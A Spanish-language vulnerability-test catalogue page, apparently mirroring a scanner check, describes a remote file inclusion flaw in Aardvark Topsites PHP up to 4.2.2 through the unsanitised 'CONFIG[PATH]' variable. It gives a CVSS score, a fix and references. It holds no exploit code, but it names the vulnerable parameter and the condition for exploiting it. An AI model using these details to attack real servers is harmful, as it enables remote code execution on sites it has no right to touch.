Web application abuses : Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability

Búsqueda de Vulnerabilidad		Buscar 324607 Descripciones CVE y 146377 Descripciones de Pruebas, accesos 10,000+ referencias cruzadas.
	Pruebas CVE Todos

ID de Prueba: 1.3.6.1.4.1.25623.1.0.200005

Categoría: Web application abuses

Título: Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability

Resumen: The remote system contains a PHP application that is prone to; remote file inclusions attacks.;; Description :;; Aardvark Topsites PHP is installed on the remote host. It is; an open source Toplist management system written in PHP.;; The application does not sanitize user-supplied input to; the 'CONFIG[PATH]' variable in some PHP files. This allows; an attacker to include arbitrary files from remote systems, and; execute them with privileges under which the webserver operates.;; The flaw is exploitable if PHP's 'register_globals' is set to on.

Descripción: Summary:
The remote system contains a PHP application that is prone to
remote file inclusions attacks.

Description :

Aardvark Topsites PHP is installed on the remote host. It is
an open source Toplist management system written in PHP.

The application does not sanitize user-supplied input to
the 'CONFIG[PATH]' variable in some PHP files. This allows
an attacker to include arbitrary files from remote systems, and
execute them with privileges under which the webserver operates.

The flaw is exploitable if PHP's 'register_globals' is set to on.

Solution:
Disable PHP's 'register_globals' or upgrade to the latest release.

CVSS Score:
6.4

CVSS Vector:
AV:N/AC:L/Au:N/C:P/I:P/A:N

Referencia Cruzada: Common Vulnerability Exposure (CVE) ID: CVE-2006-2149
BugTraq ID: 17940
http://www.securityfocus.com/bid/17940
https://www.exploit-db.com/exploits/1732
http://www.osvdb.org/25158
http://secunia.com/advisories/19911
http://www.vupen.com/english/advisories/2006/1587
XForce ISS Database: aardvark-lostpw-join-file-include(26189)
https://exchange.xforce.ibmcloud.com/vulnerabilities/26189

Copyright Copyright (C) 2008 Ferdy Riphagen

Esta es sólo una de 146377 pruebas de vulnerabilidad en nuestra serie de pruebas. Encuentre más sobre cómo ejecutar una auditoría de seguridad completa.
Para ejecutar una prueba gratuita de esta vulnerabilidad contra su sistema, regístrese ahora.

ID de Prueba:	1.3.6.1.4.1.25623.1.0.200005
Categoría:	Web application abuses
Título:	Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability
Resumen:	The remote system contains a PHP application that is prone to; remote file inclusions attacks.;; Description :;; Aardvark Topsites PHP is installed on the remote host. It is; an open source Toplist management system written in PHP.;; The application does not sanitize user-supplied input to; the 'CONFIG[PATH]' variable in some PHP files. This allows; an attacker to include arbitrary files from remote systems, and; execute them with privileges under which the webserver operates.;; The flaw is exploitable if PHP's 'register_globals' is set to on.
Descripción:	Summary: The remote system contains a PHP application that is prone to remote file inclusions attacks. Description : Aardvark Topsites PHP is installed on the remote host. It is an open source Toplist management system written in PHP. The application does not sanitize user-supplied input to the 'CONFIG[PATH]' variable in some PHP files. This allows an attacker to include arbitrary files from remote systems, and execute them with privileges under which the webserver operates. The flaw is exploitable if PHP's 'register_globals' is set to on. Solution: Disable PHP's 'register_globals' or upgrade to the latest release. CVSS Score: 6.4 CVSS Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Referencia Cruzada:	Common Vulnerability Exposure (CVE) ID: CVE-2006-2149 BugTraq ID: 17940 http://www.securityfocus.com/bid/17940 https://www.exploit-db.com/exploits/1732 http://www.osvdb.org/25158 http://secunia.com/advisories/19911 http://www.vupen.com/english/advisories/2006/1587 XForce ISS Database: aardvark-lostpw-join-file-include(26189) https://exchange.xforce.ibmcloud.com/vulnerabilities/26189
Copyright	Copyright (C) 2008 Ferdy Riphagen